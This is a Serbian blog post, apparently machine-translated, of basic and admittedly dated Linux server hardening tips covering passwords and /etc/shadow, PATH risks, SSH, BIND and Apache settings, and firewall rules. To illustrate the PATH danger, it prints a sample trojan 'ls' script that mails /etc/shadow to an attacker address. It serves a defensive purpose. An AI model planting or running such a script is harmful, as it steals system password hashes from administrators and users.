Већ дуго нисам објавио ништа на блогу и желео бих да поделим са вама неколико савета преузетих из књиге која, (Између осталих). Пронашао сам га на универзитету и управо сам прочитао, и иако је искрено помало застарео и показаће се да технике приказане технике вероватно неће функционисати с обзиром на еволуцију система, то су такође занимљиви аспекти који се могу показати.
Желим да појасним да су то савети оријентисани на Линук систем који се користи као сервер, у средњем или можда великом обиму, јер на корисничком нивоу радне површине, иако не могу бити корисни.
Такође упозоравам да су то једноставни брзи савети и нећу улазити у детаље, иако планирам да урадим још један много конкретнији и опширнији пост о одређеној теми. Али то ћу видети касније. Хајде да почнемо.
Смернице за лозинке.
Иако звучи као крилатица, добра политика лозинке прави разлику између рањивог система или не. Напади попут „грубе силе“ користе лошу лозинку за приступ систему. Најчешћи савети су:
- Комбинујте велика и мала слова.
- Користите посебне знакове.
- Бројеви.
- Више од 6 цифара (надамо се и више од 8).
Уз ово, размотримо две основне датотеке. / етц / пассвд и / етц / схадов.
Нешто врло важно је да датотека / етц / пассвд. Поред тога што нам даје име корисника, његов уид, путању до фасцикле, басх .. итд. у неким случајевима такође приказује шифровани кључ корисника.
Погледајмо његов типични састав.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
усер: црипткеи: уид: гид: патх :: патх: басх
Прави проблем овде је тај што ова датотека има дозволе -рв-р - р– што значи да има дозволе за читање за било ког корисника система. а поседовање шифрованог кључа није веома тешко дешифровати прави.
Због тога датотека постоји / етц / схадов. Ово је датотека у којој се, између осталог, чувају сви кориснички кључеви. Ова датотека има потребне дозволе тако да је ниједан корисник не може прочитати.
Да бисмо то онда поправили, морамо да пређемо на датотеку / етц / пассвд и промените шифровани кључ у „к“, то ће довести до тога да се кључ сачува само у нашој датотеци / етц / схадов.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Проблеми са ПАТХ-ом и .басхрц-ом и другима.
Када корисник изврши наредбу на својој конзоли, љуска тражи ту наредбу на листи директорија садржаних у променљивој околине ПАТХ.
Ако у конзолу откуцате "ецхо $ ПАТХ", то ће отворити нешто слично.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
Свака од ових мапа ће љуска тражити наредбу написану за њено извршавање. Он "." то значи да је прва фасцикла коју треба потражити иста мапа одакле се извршава наредба.
Претпоставимо да постоји корисник „Царлос“, а овај жели да „чини зло“. Овај корисник би могао да остави датотеку под називом „лс“ у својој главној фасцикли и у овој датотеци изврши наредбу попут:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
А ако основни корисник за одредишне ствари покуша да наведе мапе унутар директоријума царлос (пошто прво тражи наредбу у тој истој фасцикли, нехотично би послао датотеку са лозинкама на ову е-пошту, а затим и фасцикле би био наведен и сазнао би то врло касно.
Да бисмо то избегли морамо уклонити „.“ променљиве ПАТХ.
На исти начин, датотеке као што су /.басхрц, /.басхрц_профиле, ./.логин треба ревидирати и проверити да не постоји „.“ у променљивој ПАТХ, а заправо из датотека попут ове можете променити одредиште одређене команде.
Савети за услуге:
СХХ
- Онемогућите верзију 1 ссх протокола у датотеци ссхд_цонфиг.
- Не дозволи роот кориснику да се пријави ссх-ом.
- Датотеке и фасцикле ссх_хост_кеи, ссх_хост_дса_кеи и ссх_хост_рса_кеи треба да чита само роот корисник.
БИНД
- Промените поруку добродошлице у датотеци намед.цонф тако да не приказује број верзије
- Трансфери са ограниченом зоном и омогућите их само тимовима којима је потребан.
апацхе
- Спречите услугу да приказује вашу верзију у поздравној поруци. Уредите датотеку хттпд.цонф и додајте или измените редове:
ServerSignature Off
ServerTokens Prod
- Онемогући аутоматско индексирање
- Конфигуришите апацхе да не послужује осетљиве датотеке попут .хтаццес, * .инц, * .јсп .. итд
- Уклоните странице са упутствима или узорак из услуге
- Покрените апацхе у цхроотираном окружењу
Мрежна сигурност.
Неопходно је покрити све могуће улазе у ваш систем са спољне мреже, ево неколико основних савета како бисте спречили уљезе да скенирају и прибаве информације са ваше мреже.
Блокирајте ИЦМП саобраћај
Заштитни зид мора бити конфигурисан за блокирање свих врста долазног и одлазног ИЦМП саобраћаја и ехо одговора. На овај начин избегавате да вас на пример пронађе скенер који тражи опрему под напоном у опсегу ИП.
Избегавајте ТЦП скенирање пинг-а.
Један од начина скенирања вашег система је ТЦП пинг скенирање. Претпоставимо да се на вашем серверу налази Апацхе сервер на порту 80. Уљез би могао послати АЦК захтев на тај порт, чиме ће, ако систем одговори, рачунар бити жив и скенираће остале портове.
Због тога би ваш заштитни зид увек требало да има опцију „обавештеност о стању“ и да одбаци све АЦК пакете који не одговарају већ успостављеној ТЦП вези или сесији.
Неколико додатних савета:
- Користите ИДС системе за откривање скенирања порта на вашој мрежи.
- Конфигуришите заштитни зид тако да не верује у поставке порта извора везе.
То је зато што нека скенирања користе „лажни“ изворни порт као што је 20 или 53, јер многи системи верују тим портовима јер су типични за фтп или ДНС.
НАПОМЕНА: Запамтите да је већина проблема назначених у овом посту већ решена у скоро свим тренутним дистрибуцијама. Али никада не штети ако имате кључне информације о овим проблемима како се они не би десили вама.
НАПОМЕНА: Касније ћу видети одређену тему и поставићу пост са много детаљнијим и актуелнијим информацијама.
Захваљујем свима на читању.
Поздрав.
Чланак ми се заиста свидео и занима ме тема, подстичем вас да наставите са отпремањем садржаја.